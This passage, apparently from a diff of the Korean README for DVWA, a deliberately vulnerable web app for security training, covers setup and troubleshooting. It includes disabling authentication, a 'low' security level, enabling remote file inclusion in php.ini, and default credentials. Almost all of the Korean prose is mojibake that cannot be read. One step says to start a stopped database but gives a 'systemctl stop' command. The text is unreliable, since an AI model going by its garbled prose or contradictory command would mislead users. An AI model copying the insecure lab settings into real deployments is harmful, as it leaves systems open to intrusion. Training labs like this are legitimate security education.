sec) + +mysql> flush privileges; +Query OK, 0 rows affected (0.00 sec) +``` + +### ė¸ėĻ 비활ė„ąí™” + +ėŧëļ€ 도ęĩŦ는 ė¸ėĻė„ ė‚ŦėšŠí•  ėˆ˜ ė—†ėœŧë¯€ëĄœ DVWAė™€ 함ęģ˜ ė‚ŦėšŠí•  ėˆ˜ ė—†ėŠĩ니다. ė´ëĨŧ 해결하기 ėœ„í•´ ė¸ėĻ 확ė¸ė„ 비활ė„ąí™”하는 ęĩŦė„ą ė˜ĩė…˜ė´ ėžˆėŠĩ니다. ė´ëĨŧ ėœ„í•´ ė„¤ė • 파ėŧė—ė„œ 다ėŒė„ ė„¤ė •í•˜ëŠ´ 됩니다: + +```php +$_DVWA[ 'disable_authentication' ] = true; +``` + +또한 테ėŠ¤íŠ¸í•˜ë ¤ëŠ” 내ėšŠė— ė í•Ší•œ ëŗ´ė•ˆ ėˆ˜ė¤€ėœŧ로 ëŗ´ė•ˆ ėˆ˜ė¤€ė„ ė„¤ė •í•´ė•ŧ 합니다: + +```php +$_DVWA[ 'default_security_level' ] = 'low'; +``` + +ė´ ėƒíƒœė—ė„œëŠ” 로그ė¸í•  필ėš” ė—†ė´ ëĒ¨ë“  기ëŠĨė— ė•Ąė„¸ėŠ¤í•  ėˆ˜ ėžˆėŠĩ니다. + +### 폴더 ęļŒí•œ + +* `./hackable/uploads/` - ė›š ė„œëš„ėŠ¤ė— ė˜í•´ ė“°ę¸° 가ëŠĨ해ė•ŧ 합니다 (파ėŧ ė—…ëĄœë“œëĨŧ ėœ„í•´). + +### PHP ęĩŦė„ą + +ëĻŦ눅ėŠ¤ ė‹œėŠ¤í…œė—ė„œëŠ” ėŧ반ė ėœŧ로 `/etc/php/x.x/fpm/php.ini` 또는 `/etc/php/x.x/apache2/php.ini`ė—ė„œ ė°žė„ ėˆ˜ ėžˆėŠĩ니다. + +* ė›ę˛Š 파ėŧ íŦ함 (RFI)ė„ 허ėšŠí•˜ë ¤ëŠ´: + * `allow_url_include = on` [[allow_url_include](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include)] + * `allow_url_fopen = on` [[allow_url_fopen](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen)] + +* PHP가 ëĒ¨ë“  ė˜¤ëĨ˜ 메ė‹œė§€ëĨŧ 표ė‹œí•˜ë„록 하려면: + * `display_errors = on` [[display_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-errors)] + * `display_startup_errors = on` [[display_startup_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-startup-errors)] + +ëŗ€ę˛Ŋ ė‚Ŧ항ė„ ė ėšŠí•œ 후 php ė„œëš„ėŠ¤ 또는 ApacheëĨŧ 다ė‹œ ė‹œėž‘하는ė§€ 확ė¸í•˜ė„¸ėš”. + +### reCAPTCHA + +ė´ëŠ” "Insecure CAPTCHA" 랊ė—ė„œë§Œ 필ėš”하늰 해당 랊ė„ ė‚ŦėšŠí•˜ė§€ ė•ŠëŠ”다늴 ė´ ė„šė…˜ė„ ëŦ´ė‹œí•  ėˆ˜ ėžˆėŠĩ니다. + +ė—ė„œ API 키 ėŒė„ ėƒė„ąí•Šë‹ˆë‹¤. + +그런 다ėŒ ė´ 키는 `./config/config.inc.php`ė˜ 다ėŒ ė„šė…˜ė— 들ė–´ę°‘니다: + +* `$_DVWA[ 'recaptcha_public_key' ]` +* `$_DVWA[ 'recaptcha_private_key' ]` + +### 기ëŗ¸ ėžę˛Š ėĻëĒ… + +**기ëŗ¸ ė‚ŦėšŠėž ė´ëĻ„ = `admin`** + +**기ëŗ¸ ė•”호 = `password`** + +_... ė‰Ŋ게 브ëŖ¨íŠ¸ íŦėŠ¤ë  ėˆ˜ ėžˆėŒ ;)_ + +로그ė¸ URL: http://127.0.0.1/login.php + +_ė°¸ęŗ : DVWAëĨŧ 다ëĨ¸ 디렉토ëĻŦė— ė„¤ėš˜í•œ ę˛Ŋėš° ė´ URLė´ 다ëĨŧ ėˆ˜ ėžˆėŠĩ니다._ + + +- - - + +## ëŦ¸ė œ 해결 + +ė´ ëŦ¸ė œ 해결 방법ė€ Debian 기반 ë°°íŦ판ė¸ Debian, Ubuntu 및 KaliëĨŧ ė‚ŦėšŠí•œë‹¤ęŗ  가ė •í•Šë‹ˆë‹¤. 다ëĨ¸ ë°°íŦ판ė˜ ę˛Ŋėš° 해당 ëĒ…ë šė„ ė—…데ė´íŠ¸í•˜ė—Ŧ 따ëĨ´ė„¸ėš”. + +### ėģ¨í…Œė´ë„ˆ + +#### 로그ė— ė ‘ęˇŧ하ęŗ  ė‹ļė–´ėš” + +Docker Desktopė„ ė‚ŦėšŠí•˜ëŠ” ę˛Ŋėš° 로그는 그래í”Ŋ ė• í”ŒëĻŦėŧ€ė´ė…˜ė—ė„œ ė ‘ęˇŧ할 ėˆ˜ ėžˆėŠĩ니다. +ėƒˆëĄœėš´ 버ė „ė—ė„œ ė•Ŋ간ė˜ ė„¸ëļ€ ė‚Ŧ항ė´ ëŗ€ę˛Ŋ될 ėˆ˜ ėžˆė§€ë§Œ ė ‘ęˇŧ 방법ė€ 동ėŧ해ė•ŧ 합니다. + +![DVWA compose 개ėš”](./docs/graphics/docker/overview.png) +![DVWA 로그 ëŗ´ę¸°](docs/graphics/docker/detail.png) + +로그는 터미널ė—ė„œë„ 확ė¸í•  ėˆ˜ ėžˆėŠĩ니다. + +1. 터미널ė„ ė—´ęŗ  ėž‘ė—… 디렉토ëĻŦëĨŧ DVWA로 ëŗ€ę˛Ŋ하ė„¸ėš”. +2. ëŗ‘핊된 로그 표ė‹œ + + ```shell + docker compose logs + ``` + + 로그ëĨŧ 파ėŧ로 내ëŗ´ë‚´ë ¤ëŠ” ę˛Ŋėš°, ė˜ˆëĨŧ 들ė–´ `dvwa.log` + + ```shell + docker compose logs >dvwa.log + ``` + +#### 다ëĨ¸ íŦ트ė—ė„œ DVWA ė‹¤í–‰í•˜ęŗ  ė‹ļė–´ėš” + +기ëŗ¸ė ėœŧ로 íŦ트 80ė„ ė‚ŦėšŠí•˜ė§€ ė•ŠëŠ” ė´ėœ ëŠ” ëĒ‡ 가ė§€ ėžˆėŠĩ니다. + +- ėŧëļ€ ė‚ŦėšŠėžëŠ” ė´ë¯¸ íŦ트 80ė—ė„œ ëŦ´ė–¸ę°€ëĨŧ ė‹¤í–‰ ė¤‘ėŧ ėˆ˜ ėžˆėŠĩ니다. +- ėŧëļ€ ė‚ŦėšŠėžëŠ” ëŖ¨íŠ¸ëĻŦėŠ¤ ėģ¨í…Œė´ë„ˆ ė—”ė§„(ė˜ˆ: Podman)ė„ ė‚ŦėšŠí•  ėˆ˜ ėžˆėœŧ늰 80ė€ 특ęļŒ íŦ트(< 1024)ėž…니다. ėļ”ę°€ ęĩŦė„ą(ė˜ˆ: `net.ipv4.ip_unprivileged_port_start` ė„¤ė •)ė´ 필ėš”하ė§€ë§Œ ė§ė ‘ ėĄ°ė‚Ŧ해ė•ŧ 합니다. + +`compose.yml` 파ėŧė—ė„œ íŦ트 바ė¸ë”Šė„ ëŗ€ę˛Ŋ하ė—Ŧ DVWAëĨŧ 다ëĨ¸ íŦ트ė—ė„œ 노ėļœí•  ėˆ˜ ėžˆėŠĩ니다. +ė˜ˆëĨŧ 들ė–´, + +```yml +ports: + - 127.0.0.1:4280:80 +``` + +ëĨŧ + +```yml +ports: + - 127.0.0.1:8806:80 +``` + +로 ëŗ€ę˛Ŋ할 ėˆ˜ ėžˆėŠĩ니다. + +DVWA는 ė´ė œ `http://localhost:8806`ė—ė„œ ė ‘ęˇŧ할 ėˆ˜ ėžˆėŠĩ니다. + +디바ė´ėŠ¤ė—ė„œë§Œ 독ė ė ėœŧ로 DVWAė— ė•Ąė„¸ėŠ¤í•˜ęŗ  ė‹ļė„ 때가 ėžˆėŠĩ니다(ė˜ˆ: ė›ŒíŦėƒĩė„ ėœ„í•œ 테ėŠ¤íŠ¸ 머ė‹ ė„ ė„¤ė •í•˜ëŠ” ę˛Ŋėš°), 로ėģŦ 네트ė›ŒíŦė—ė„œë„ ė•Ąė„¸ėŠ¤í•  ėˆ˜ ėžˆë„록 하려면 íŦ트 매핑ė—ė„œ `127.0.0.1:`ė„ ė œęą°í•˜ęą°ë‚˜(또는 LAN IP로 대ė˛´)하ė„¸ėš”. ė´ë ‡ę˛Œ 하면 ëĒ¨ë“  ė‚ŦėšŠ 가ëŠĨ한 디바ė´ėŠ¤ė—ė„œ ėˆ˜ė‹ ëŠë‹ˆë‹¤. ė•ˆė „í•œ 기ëŗ¸ ė„¤ė •ė€ 항ėƒ 로ėģŦ ëŖ¨í”„ë°ą 디바ė´ėŠ¤ė—ė„œë§Œ ėˆ˜ė‹ í•˜ëŠ” 것ėž…니다. 결ęĩ­, ė´ę˛ƒė€ ė‚ŦėšŠėžė˜ 머ė‹ ė—ė„œ ė‹¤í–‰ë˜ëŠ” ėœ„험한 ė›š ė‘ėšŠ 프로그램ėž…니다. + +#### Docker ė‹¤í–‰ ė‹œ DVWA ėžë™ ė‹œėž‘ + +íŦ함된 [`compose.yml`](./compose.yml) 파ėŧė€ Docker가 ė‹œėž‘될 때 ėžë™ėœŧ로 DVWAė™€ 해당 데ė´í„°ë˛ ė´ėŠ¤ëĨŧ ė‹¤í–‰í•Šë‹ˆë‹¤. + +ė´ 기ëŠĨė„ 비활ė„ąí™”하려늴 [`compose.yml`](./compose.yml) 파ėŧė—ė„œ `restart: unless-stopped` ëŧė¸ė„ ė‚­ė œí•˜ęą°ë‚˜ ėŖŧė„ ė˛˜ëĻŦ하ė„¸ėš”. + +ė´ 동ėž‘ė„ ėŧė‹œė ėœŧ로 비활ė„ąí™”하려늴 `docker compose stop`ė„ ė‹¤í–‰í•˜ęą°ë‚˜ Docker Desktopė„ ė‚ŦėšŠí•˜ė—Ŧ `dvwa`ëĨŧ ė°žė•„ ė¤‘ė§€ëĨŧ 클ëĻ­í•˜ė„¸ėš”. +또는 ėģ¨í…Œė´ë„ˆëĨŧ ė‚­ė œí•˜ęą°ë‚˜ `docker compose down`ė„ ė‹¤í–‰í•  ėˆ˜ ėžˆėŠĩ니다. + +### 로그 파ėŧ + +ëĻŦ눅ėŠ¤ ė‹œėŠ¤í…œė—ė„œëŠ” Apache가 기ëŗ¸ė ėœŧ로 두 가ė§€ 로그 파ėŧė„ ėƒė„ąí•Šë‹ˆë‹¤. `access.log`ė™€ `error.log`로, 데비ė•ˆ 기반 ė‹œėŠ¤í…œė—ė„œëŠ” ëŗ´í†ĩ `/var/log/apache2/`ė— ėžˆėŠĩ니다. + +ė—ëŸŦ ëŗ´ęŗ ė„œ, ëŦ¸ė œ 등ė„ ė œėļœí•  때, ė ė–´ë„ 각각ė˜ 파ėŧė˜ 마ė§€ë§‰ 다ė„¯ ė¤„ė„ íŦ함해ė•ŧ 합니다. 데비ė•ˆ 기반 ė‹œėŠ¤í…œė—ė„œëŠ” 다ėŒęŗŧ 같ė´ 가ė ¸ė˜Ŧ ėˆ˜ ėžˆėŠĩ니다. + +``` +tail -n 5 /var/log/apache2/access.log /var/log/apache2/error.log +``` + +### ė‚Ŧė´íŠ¸ė— ė ‘ė†í•˜ė—Ŧ 404 ė˜¤ëĨ˜ę°€ 발ėƒí–ˆėŠĩ니다 + +ė´ ëŦ¸ė œę°€ 발ėƒí•˜ëŠ´ 파ėŧ ėœ„ėš˜ëĨŧ ė´í•´í•´ė•ŧ 합니다. 기ëŗ¸ė ėœŧ로 Apache ëŦ¸ė„œ ëŖ¨íŠ¸(ė›š ėŊ˜í…ė¸ ëĨŧ ė°žëŠ” ęŗŗ)는 `/var/www/html`ėž…니다. ė´ 디렉토ëĻŦė— 파ėŧ `hello.txt`ė„ ë„Ŗė€ ę˛Ŋėš°ė—ëŠ” `http://localhost/hello.txt`로 ė ‘ė†í•´ė•ŧ 합니다. + +디렉토ëĻŦëĨŧ 만들ęŗ  파ėŧė„ ë„Ŗė€ ę˛Ŋėš° - `/var/www/html/mydir/hello.txt` - ꡸ëŸŦ늴 `http://localhost/mydir/hello.txt`로 ė ‘ė†í•´ė•ŧ 합니다. + +ëĻŦ눅ėŠ¤ëŠ” 기ëŗ¸ė ėœŧ로 대ė†ŒëŦ¸ėžëĨŧ ęĩŦëļ„í•˜ë¯€ëĄœ ėœ„ė˜ ė˜ˆė—ė„œëŠ” 다ėŒė— 대한 `404 Not Found`가 발ėƒí•Šë‹ˆë‹¤. + +- `http://localhost/MyDir/hello.txt` +- `http://localhost/mydir/Hello.txt` +- `http://localhost/MYDIR/hello.txt` + +ė´ę˛ƒė´ DVWAė— ė–´ë–ģ게 ė˜í–Ĩė„ 미ėš˜ëŠ”ę°€ėš”? 대ëļ€ëļ„ė˜ ė‚Ŧ람들ė€ DVWAëĨŧ `/var/www/html`ė— ė˛´íŦė•„ė›ƒí•˜ę¸° 때ëŦ¸ė— ëĒ¨ë“  DVWA 파ėŧė´ 들ė–´ ėžˆëŠ” `/var/www/html/DVWA/` 디렉토ëĻŦ가 ėƒęšë‹ˆë‹¤. 그런 다ėŒ `http://localhost/`로 ė ‘ė†í•˜ëŠ´ `404` 또는 기ëŗ¸ Apache 환ė˜ 페ė´ė§€ëĨŧ 받게 됩니다. 파ėŧė´ DVWAė— ėžˆėœŧë¯€ëĄœ `http://localhost/DVWA`로 ė ‘ė†í•´ė•ŧ 합니다. + +다ëĨ¸ 흔한 ė‹¤ėˆ˜ëŠ” `http://localhost/dvwa`로 ė ‘ė†í•˜ëŠ” 것ėž…니다. ė´ëŠ” ëĻŦ눅ėŠ¤ 디렉토ëĻŦ 매ėš­ė— 따ëŧ `dvwa`가 `DVWA`가 ė•„ë‹ˆę¸° 때ëŦ¸ė— `404`가 발ėƒí•Šë‹ˆë‹¤. + +따ëŧė„œ ė„¤ėš˜ 후ė— ė‚Ŧė´íŠ¸ė— ė ‘ė†í•˜ė—Ŧ `404`ëĨŧ 받는 ę˛Ŋėš°, 파ėŧė„ ė–´ë””ė— ė„¤ėš˜í–ˆëŠ”ė§€, ëŦ¸ė„œ ëŖ¨íŠ¸ė™€ė˜ 관ęŗ„는 ëŦ´ė—‡ė¸ė§€, ė‚ŦėšŠí•œ 디렉토ëĻŦė˜ ę˛Ŋėš°ëĨŧ ęŗ ë ¤í•˜ė„¸ėš”. + +### ė„¤ė • ė‹¤í–‰ ė¤‘ "Access denied" ė˜¤ëĨ˜ę°€ 발ėƒí–ˆėŠĩ니다 + +ė„¤ėš˜ ėŠ¤íŦëĻŊ트ëĨŧ ė‹¤í–‰í•˜ëŠ” 도ė¤‘ 다ėŒė„ ëŗ´ę˛Œ 되늴, ė„¤ė • 파ėŧė˜ ė‚ŦėšŠėž ė´ëĻ„ 또는 비밀번호가 데ė´í„°ë˛ ė´ėŠ¤ė— ęĩŦė„ąëœ 것ęŗŧ ėŧėš˜í•˜ė§€ ė•ŠëŠ”다는 것ėž…니다. + +``` +Database Error #1045: Access denied for user 'notdvwa'@'localhost' (using password: YES). +``` + +ė´ ė˜¤ëĨ˜ëŠ” ė‚ŦėšŠėž ė´ëĻ„ė´ `notdvwa`ėž„ė„ ė•Œë ¤ė¤ë‹ˆë‹¤. + +다ėŒ ė˜¤ëĨ˜ëŠ” ė„¤ė • 파ėŧė„ ėž˜ëĒģ된 데ė´í„°ë˛ ė´ėŠ¤ė— ė—°ę˛°í•œ 것ėž…니다. + +``` +SQL: Access denied for user 'dvwa'@'localhost' to database 'notdvwa' +``` + +ė´ę˛ƒė€ ė‚ŦėšŠėžę°€ `dvwa` ė‚ŦėšŠėžëĨŧ ė‚ŦėšŠí•˜ęŗ  `notdvwa` 데ė´í„°ë˛ ė´ėŠ¤ė— ė—°ę˛°í•˜ë ¤ęŗ  ė‹œë„했다ęŗ  말하ęŗ  ėžˆėŠĩ니다. + +ė˛Ģ 번ė§¸ 할 ėŧė€ ė„¤ė • 파ėŧė— ėž…ë Ĩ한 것ė´ ė‹¤ė œëĄœ ėžˆëŠ”ė§€ 확ė¸í•˜ëŠ” 것ėž…니다. + +ė˜ˆėƒí•œ 대로 맞는다면, 다ėŒėœŧ로 할 ėŧė€ ëĒ…ë š ė¤„ė—ė„œ ė‚ŦėšŠėžëĄœ 로그ė¸í•  ėˆ˜ ėžˆëŠ”ė§€ 확ė¸í•˜ëŠ” 것ėž…니다. 데ė´í„°ë˛ ė´ėŠ¤ ė‚ŦėšŠėžę°€ `dvwa`ė´ęŗ  ė•”í˜¸ę°€ `p@ssw0rd`ė¸ ę˛Ŋėš° 다ėŒ ëĒ…ë šė„ ė‹¤í–‰í•˜ė„¸ėš”. + +``` +mysql -u dvwa -pp@ssw0rd -D dvwa +``` + +*ė°¸ęŗ : `-p` 뒤ė— ęŗĩë°ąė´ ė—†ėŠĩ니다.* + +다ėŒęŗŧ 같ė´ ëŗ´ė¸ë‹¤ëŠ´, ė•”í˜¸ę°€ ė˜Ŧ바ëĻ…니다. + +``` +Welcome to the MariaDB monitor. Commands end with ; or \g. +Your MariaDB connection id is 14 +Server version: 10.3.22-MariaDB-0ubuntu0.19.10.1 Ubuntu 19.10 + +Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +MariaDB [dvwa]> +``` + +ëĒ…ë š ė¤„ė—ė„œ ė—°ę˛°í•  ėˆ˜ ėžˆë‹¤ëŠ´, ė„¤ė • 파ėŧė— ëŦ´ė—‡ė¸ę°€ ėž˜ëĒģ된 것ė´ ėžˆė„ 확ëĨ ė´ 높ėŠĩ니다. ꡸ëŸŦ늴 ė„¤ė •ė„ 다ė‹œ 확ė¸í•œ 후 ëŦ¸ė œëĨŧ 해결할 ėˆ˜ ė—†ėœŧ늴 ëŦ¸ė œëĨŧ ė œę¸°í•˜ė„¸ėš”. + +다ėŒęŗŧ 같ė€ 내ėšŠė„ ëŗ´ę˛Œ 되늴 ė‚ŦėšŠėž ė´ëĻ„ 또는 비밀번호가 ėž˜ëĒģ되ė—ˆėŠĩ니다. [Database Setup](#database-setup) 단ęŗ„ëĨŧ 반ëŗĩ하ęŗ  ė „ė˛´ ęŗŧė •ė—ė„œ 동ėŧ한 ė‚ŦėšŠėž ė´ëĻ„ęŗŧ ė•”호ëĨŧ ė‚ŦėšŠí–ˆëŠ”ė§€ 확ė¸í•˜ė„¸ėš”. + +``` +ERROR 1045 (28000): Access denied for user 'dvwa'@'localhost' (using password: YES) +``` + +다ėŒęŗŧ 같ė€ 내ėšŠė„ ëŗ´ę˛Œ 되늴 ė‚ŦėšŠėž ėžę˛Š ėĻëĒ…ė€ ė˜Ŧ바ëĨ´ė§€ë§Œ ė‚ŦėšŠėžę°€ 데ė´í„°ë˛ ė´ėŠ¤ė— ė•Ąė„¸ėŠ¤í•  ėˆ˜ ė—†ėŠĩ니다. 다ė‹œ ė„¤ė • 단ęŗ„ëĨŧ 반ëŗĩ하ęŗ  ė‚ŦėšŠ ė¤‘ė¸ 데ė´í„°ë˛ ė´ėŠ¤ ė´ëĻ„ė„ 확ė¸í•˜ė„¸ėš”. + +``` +ERROR 1044 (42000): Access denied for user 'dvwa'@'localhost' to database 'dvwa' +``` + +마ė§€ë§‰ėœŧ로 다ėŒęŗŧ 같ė€ ė˜¤ëĨ˜ëĨŧ ëŗŧ ėˆ˜ ėžˆėŠĩ니다. + +``` +ERROR 2002 (HY000): 로ėģŦ MySQL ė„œë˛„ė— ė†Œėŧ“ '/var/run/mysqld/mysqld.sock'ė„(ëĨŧ) í†ĩ해 ė—°ę˛°í•  ėˆ˜ ė—†ėŠĩ니다 (2) +``` + +ė´ę˛ƒė€ ė¸ėĻ ëŦ¸ė œę°€ ė•„니ëŧ 데ė´í„°ë˛ ė´ėŠ¤ ė„œë˛„ę°€ ė‹¤í–‰ë˜ė§€ ė•Šė•˜ėŒė„ 나타냅니다. 다ėŒ ëĒ…ë šėœŧ로 ė‹œėž‘하ė„¸ėš”. + +```sh +sudo service mysql start +``` + +### ė—°ę˛° ęą°ëļ€ + +다ėŒęŗŧ ėœ ė‚Ŧ한 ė˜¤ëĨ˜ę°€ 발ėƒí•˜ëŠ” ę˛Ŋėš°: + +``` +Fatal error: Uncaught mysqli_sql_exception: Connection refused in /var/sites/dvwa/non-secure/htdocs/dvwa/includes/dvwaPage.inc.php:535 +``` + +데ė´í„°ë˛ ė´ėŠ¤ ė„œë˛„ę°€ ė‹¤í–‰ë˜ė§€ ė•Šęą°ë‚˜ ęĩŦė„ą 파ėŧė— ėž˜ëĒģ된 IP ėŖŧė†Œę°€ ėžˆëŠ” 것ė„ ė˜ë¯¸í•Šë‹ˆë‹¤. + +ęĩŦė„ą 파ėŧė—ė„œ 데ė´í„°ë˛ ė´ėŠ¤ ė„œë˛„ę°€ ė˜ˆėƒë˜ëŠ” ėœ„ėš˜ëĨŧ 확ė¸í•˜ë ¤ëŠ´ ė´ ė¤„ė„ 확ė¸í•˜ė‹­ė‹œė˜¤: + +``` +$_DVWA[ 'db_server' ] = '127.0.0.1'; +``` + +그런 다ėŒė´ ė„œë˛„ëĄœ ė´ë™í•˜ė—Ŧ ė‹¤í–‰ ė¤‘ė¸ė§€ 확ė¸í•˜ė‹­ė‹œė˜¤. Linuxė—ė„œëŠ” 다ėŒęŗŧ 같ė´ ėˆ˜í–‰í•  ėˆ˜ ėžˆėŠĩ니다: + +``` +systemctl status mariadb.service +``` + +다ėŒęŗŧ 같ė€ 내ėšŠė„ ė°žėœŧė‹œëŠ´ 됩니다. ė¤‘ėš”í•œ ëļ€ëļ„ė€ `active (running)`ė´ëŧęŗ  ëĒ…ė‹œëœ ëļ€ëļ„ėž…니다. + +``` +● mariadb.service - MariaDB 10.5.19 database server + Loaded: loaded (/lib/systemd/system/mariadb.service; enabled; preset: enabled) + Active: active (running) since Thu 2024-03-14 16:04:25 GMT; 1 week 5 days ago +``` + +ė‹¤í–‰ ė¤‘ė´ ė•„니ëŧ늴 다ėŒęŗŧ 같ė´ ė‹œėž‘í•  ėˆ˜ ėžˆėŠĩ니다: + +``` +sudo systemctl stop mariadb.service +``` + +`sudo`ė— ėœ ė˜í•˜ęŗ  ėš”ė˛­ ė‹œ Linux ė‚ŦėšŠėž ė•”호ëĨŧ ėž…ë Ĩ하ė‹­ė‹œė˜¤. + +Windowsė—ė„œëŠ” XAMPP ėŊ˜ė†”ė—ė„œ ėƒíƒœëĨŧ 확ė¸í•˜ė‹­ė‹œė˜¤. + +### ė•Œë ¤ė§€ė§€ ė•Šė€ ė¸ėĻ 방법 + +가ėžĨ ėĩœė‹  버ė „ė˜ MySQLė—ė„œ PHP는 기ëŗ¸ ęĩŦė„ąėœŧ로 데ė´í„°ë˛ ė´ėŠ¤ė™€ í†ĩė‹ í•  ėˆ˜ ė—†ę˛Œ 되ė—ˆėŠĩ니다. ė„¤ė • ėŠ¤íŦëĻŊ트ëĨŧ ė‹¤í–‰í•˜ë ¤ęŗ  하ęŗ  다ėŒ 메ė‹œė§€ę°€ 표ė‹œë˜ëŠ” ę˛Ŋėš° ęĩŦė„ąė´ ėž˜ëĒģ되ė—ˆėŒė„ ė˜ë¯¸í•Šë‹ˆë‹¤. + +``` +Database Error #2054: The server requested authentication method unknown to the client. +``` + +두 가ė§€ ė˜ĩė…˜ė´ ėžˆėŠĩ니다. 가ėžĨ ė‰Ŧėš´ 방법ė€ MySQLė„ ė œęą°í•˜ęŗ  MariaDBëĨŧ ė„¤ėš˜í•˜ëŠ” 것ėž…니다. 다ėŒė€ MariaDB 프로ė íŠ¸ė˜ ęŗĩė‹ 가ė´ë“œėž…니다: + + + +또는 다ėŒ 단ęŗ„ëĨŧ 따ëĨ´ė„¸ėš”: + +1. ëŖ¨íŠ¸ëĄœ 다ėŒ 파ėŧė„ 편ė§‘하ė‹­ė‹œė˜¤: `/etc/mysql/mysql.conf.d/mysqld.cnf` +2. `[mysqld]` ė•„래ė— 다ėŒė„ ėļ”ę°€í•˜ė‹­ė‹œė˜¤: + `default-authentication-plugin=mysql_native_password` +3. 데ė´í„°ë˛ ė´ėŠ¤ëĨŧ 다ė‹œ ė‹œėž‘하ė‹­ė‹œė˜¤: `sudo service mysql restart` +4. 데ė´í„°ë˛ ė´ėŠ¤ ė‚ŦėšŠėžė˜ ė¸ėĻ 방법ė„ 확ė¸í•˜ė‹­ė‹œė˜¤: + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------------------+-----------------------+ + | Host | User | plugin | + +-----------+------------------+-----------------------+ + | localhost | dvwa | caching_sha2_password | + +-----------+------------------+-----------------------+ + 1 rows in set (0.00 sec) + ``` + +5. `caching_sha2_password`ëĨŧ ëŗ´ę˛Œ 될 것ėž…니다. 그렇다면 다ėŒ ëĒ…ë šė„ ė‹¤í–‰í•˜ė‹­ė‹œė˜¤: + + ```sql + mysql> ALTER USER dvwa@localhost IDENTIFIED WITH mysql_native_password BY 'p@ssw0rd'; + ``` + +6. 다ė‹œ 확ė¸ė„ ė‹¤í–‰í•˜ëŠ´ ė´ė œ `mysql_native_password`ëĨŧ ëŗŧ ėˆ˜ ėžˆė–´ė•ŧ 합니다. + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------+-----------------------+ + | Host | User | plugin | + +-----------+------+-----------------------+ + | localhost | dvwa | mysql_native_password | + +-----------+------+-----------------------+ + 1 row in set (0.00 sec) + ``` + +ė´ ëĒ¨ë“  ęŗŧė •ė„ ęą°ėšœ 후 ė„¤ė • 프로ė„¸ėŠ¤ę°€ ė •ėƒė ėœŧ로 ėž‘동해ė•ŧ 합니다. + +더 많ė€ ė •ëŗ´ę°€ 필ėš”하늴 다ėŒ 페ė´ė§€ëĨŧ ė°¸ėĄ°í•˜ė‹­ė‹œė˜¤: . + +### 데ė´í„°ë˛ ė´ėŠ¤ ė˜¤ëĨ˜ #2002: 해당 파ėŧ 또는 디렉터ëĻŦ가 ė—†ėŠĩ니다. + +데ė´í„°ë˛ ė´ėŠ¤ ė„œë˛„ę°€ ė‹¤í–‰ë˜ė§€ ė•ŠėŠĩ니다. Debian 기반 ë°°íŦ판ė—ė„œëŠ” 다ėŒ ëĒ…ë šė„ ė‚ŦėšŠí•˜ė—Ŧ ė‹¤í–‰í•  ėˆ˜ ėžˆėŠĩ니다: + +```sh +sudo service mysql start +``` + +### "MySQL ė„œë˛„ę°€ ėĸ…ëŖŒë˜ė—ˆėŠĩ니다" 및 "패킷 ėˆœė„œę°€ ėž˜ëĒģ되ė—ˆėŠĩ니다" ė˜¤ëĨ˜ + +ė´ëŸŦ한 ė˜¤ëĨ˜ę°€ 발ėƒí•˜ëŠ” ëĒ‡ 가ė§€ ė´ėœ ę°€ ėžˆė§€ë§Œ, 가ėžĨ 가ëŠĨė„ąė´ 높ė€ ė´ėœ ëŠ” ė‹¤í–‰ ė¤‘ė¸ 데ė´í„°ë˛ ė´ėŠ¤ ė„œë˛„ 버ė „ė´ PHP 버ė „ęŗŧ 호환되ė§€ ė•Šę¸° 때ëŦ¸ėž…니다. + +ė´ëŠ” MySQLė˜ ėĩœė‹  버ė „ė„ ė‹¤í–‰ ė¤‘ėŧ 때 가ėžĨ 흔하게 발ėƒí•˜ëŠ” 현ėƒėž…니다. PHPė™€ MySQLė´ ėž˜ 동ėž‘하ė§€ ė•ŠėŠĩ니다. 가ėžĨ ėĸ‹ė€ ėĄ°ė–¸ė€ MySQLė„ 버ëĻŦęŗ  MariaDBëĨŧ ė„¤ėš˜í•˜ëŠ” 것ėž…니다. ė´ëŠ” ėš°ëĻŦ가 ė§€ė›í•  ėˆ˜ ė—†ëŠ” ëŦ¸ė œėž…니다. + +더 많ė€ ė •ëŗ´ëŠ” 다ėŒė„ ė°¸ėĄ°í•˜ė‹­ė‹œė˜¤: + + + +### ëĒ…ë š ė‚Ŋėž…ė´ ėž‘동하ė§€ ė•ŠėŠĩ니다 + +Apache가 ė›š ė„œë˛„ė—ė„œ ëĒ…ë šė„ ė‹¤í–‰í•  ėļŠëļ„í•œ ęļŒí•œė„ 갖ęŗ  ėžˆė§€ ė•Šė„ ėˆ˜ ėžˆėŠĩ니다. Linuxė—ė„œ DVWAëĨŧ ė‹¤í–‰ ė¤‘ė¸ ę˛Ŋėš° root로 로그ė¸í–ˆëŠ”ė§€ 확ė¸í•˜ė‹­ė‹œė˜¤. Windowsė—ė„œëŠ” 관ëĻŦėžëĄœ 로그ė¸í•˜ė‹­ė‹œė˜¤. + +### CentOSė—ė„œ 데ė´í„°ë˛ ė´ėŠ¤ę°€ ė—°ę˛°ë˜ė§€ ė•ŠëŠ” ė´ėœ ëŠ” ëŦ´ė—‡ėž…ë‹ˆęšŒ? + +SELinuxė™€ 관련된 ëŦ¸ė œëĄœ ė¸í•´ ëŦ¸ė œę°€ 발ėƒí•  ėˆ˜ ėžˆėŠĩ니다. SELinuxëĨŧ 비활ė„ąí™”í•˜ęą°ë‚˜ 다ėŒ ëĒ…ë šė„ ė‹¤í–‰í•˜ė—Ŧ ė›š ė„œë˛„ę°€ 데ė´í„°ë˛ ė´ėŠ¤ė™€ í†ĩė‹ í•  ėˆ˜ ėžˆë„록 합니다: + +``` +setsebool -P httpd_can_network_connect_db 1 +``` + +### ꡸ ė™¸ ëŦ¸ė œ + +ėĩœė‹  ëŦ¸ė œ 해결 ė •ëŗ´ëĨŧ ėœ„í•´ git ė €ėžĨė†Œė˜ ė—´ëĻ° 및 ë‹Ģ힌 티ėŧ“ė„ ëĒ¨ë‘ ėŊė–´ëŗ´ė‹­ė‹œė˜¤: + + + +티ėŧ“ė„ ė œėļœí•˜ę¸° ė „ė— ė €ėžĨė†Œė—ė„œ ėĩœė‹  ėŊ”ë“œëĨŧ 